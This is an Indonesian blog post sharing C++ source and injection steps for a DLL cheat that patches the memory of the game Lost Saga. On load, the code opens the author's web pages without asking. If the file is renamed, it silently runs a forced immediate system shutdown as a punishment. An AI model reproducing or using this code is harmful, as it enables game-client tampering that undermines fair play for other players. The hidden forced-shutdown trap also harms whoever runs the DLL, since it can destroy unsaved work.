Archive for 2014






Kali Ini saya Share Base Ama String Fast Delay

jika ingin no delay , tinggal ubah Bytenya


  1. //===================================//
  2. //Name : Base LostSaga Fullhacks
  3. //Created : RyuuKa_
  4. //Thank'z : [U]ndetect-[T]eam
  5. //Notice : [U]ndetect-[T]eam
  6. //===================================//
  7.  
  8. #define WIN32_LEAN_AND_MEAN
  9. #include <windows.h>
  10. #include <stdio.h>
  11. #include <stdlib.h>
  12.  
  13. #define lay 0x16A7096 // offset
  14.  
  15.  
  16. LPTSTR ModulGame = "lostsaga.exe";
  17.  
  18. void Patch(void *adr, void *ptr, int size)
  19. {
  20. DWORD OldProtection;
  21. VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection);
  22. memcpy(adr,ptr,size);
  23. VirtualProtect(adr,size,OldProtection, &OldProtection);
  24. }
  25.  
  26. void WritePointer(unsigned long ulBase, int iOffset, int iValue)
  27. {
  28. if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long)))
  29. {
  30. if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long)))
  31. {
  32. *(int*)(*(unsigned long*)ulBase + iOffset) = iValue;
  33. }
  34. }
  35. }
  36.  
  37. DWORD WINAPI MemPacth(LPVOID param)
  38. {
  39. while (1) {
  40.  
  41.  
  42. //-------------=| Hotkey Langsung On|=------------- //
  43.  
  44. DWORD adrMin1, adrMin2 = 0;
  45. DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
  46. if (dwPB > 0) {
  47. adrMin1 = dwPB + (DWORD)lay;
  48. Patch((void *)(adrMin1),(void*)(PBYTE)"\x39\x39", 2); // byte = 39 39
  49.  
  50.  
  51. //-------------=| Hotkey Langsung On|=------------- //
  52.  
  53. }
  54.  
  55. Sleep(5);
  56. }
  57. return (0);
  58. }
  59.  
  60.  
  61. BOOL WINAPI DllMain ( HMODULE hDll, DWORD dwReason, LPVOID lpReserved )
  62. {
  63. if (dwReason == DLL_PROCESS_ATTACH)
  64. {
  65. DisableThreadLibraryCalls(hDll);
  66. if(dwReason == DLL_PROCESS_ATTACH){
  67. MessageBox(0, "Created By RyuuKa_ A.k.A Rezza AkbaRz \n\n Let's Funny", "WARNING..!!", MB_OKCANCEL + MB_ICONWARNING );
  68. MessageBox(0, "HAPPY Cheating", "Thanks To you !!!!", MB_OK + MB_ICONINFORMATION );
  69. system("start http://eiizen.blogspot.com"); //notice
  70. system("start www.facebook.com/RyouKaaa"); //notice
  71. CreateThread(0, 0, (LPTHREAD_START_ROUTINE)MemPacth, 0, 0, 0);
  72. CreateThread(0, 0, (LPTHREAD_START_ROUTINE)MemPacth, 0, 0, 0);
  73. char strDLLName [_MAX_PATH];
  74. GetModuleFileName(hDll, strDLLName , _MAX_PATH);
  75. if (strstr(strDLLName, "Rz.dll") <= 0) { // Nama DLL
  76. MessageBox(0, "Why you Renaming My File ?","Warning",MB_OK + MB_ICONINFORMATION );
  77. MessageBox(0, "You Are a Cheater Or Leacher ?","Warning",MB_OK + MB_ICONINFORMATION );
  78. MessageBox(0, "See Ya , \nYour System Data Will Be Restarted\n\nTo? Say GoodBye ","Warning",MB_OK + MB_ICONINFORMATION );
  79. system("start C:/Windows/?System32/?shutdown.exe -s -f -t 00"); // Jika dll anda di rename maka akan shutdown
  80. ExitProcess(0);//ERROR
  81. }
  82. }
  83. else if(dwReason == DLL_PROCESS_DETACH)
  84. {
  85. }
  86. }
  87. return TRUE;
  88. }


Untuk yang mau buat Trainer , Stringnya =                   ÃˆBioAnubisItem   Value = 99

String Lainnya

scene_blend 
specular_power 
local_glow 
fill_mode
alpha_test
color_write 
remove_light_type 
light_iterate 
wave_xform 
rotate_anim
alpha_blend 
scale_uv_on_center
max_anisotropy 
custom_value
UnExpected 
use_light_texture 
counter_clockwise 
src_color 
dest_alpha
UnNamed_%d
ioSkeleton 
ioMesh 
hide_mesh
show_mesh 
jump_anitime                  by : Vj Richard

Skian Thanks

Base + String Fast Delay Lostsaga

Posted by Unknown
Senin, 09 Juni 2014






Fitur :
- Fast Delay Kedip 1 dtk

Download Cheat : 
Disini

Tutorial :
1. Buka PerX
2. Ganti Guns.exe menjadi lostsaga.exe (Kecil semua) , Pilih Automatically
3. Klik Browse
4. cari Rz.dll ( Extract here dulu DLL nya )
5. Buka Lostsaga
6. Log in
7. Tes di HQ

Popular Post

Label

Diberdayakan oleh Blogger.

- Copyright © 2013 EiZen Blog -Sao v2- Powered by Blogger - Designed by Johanes Djogan -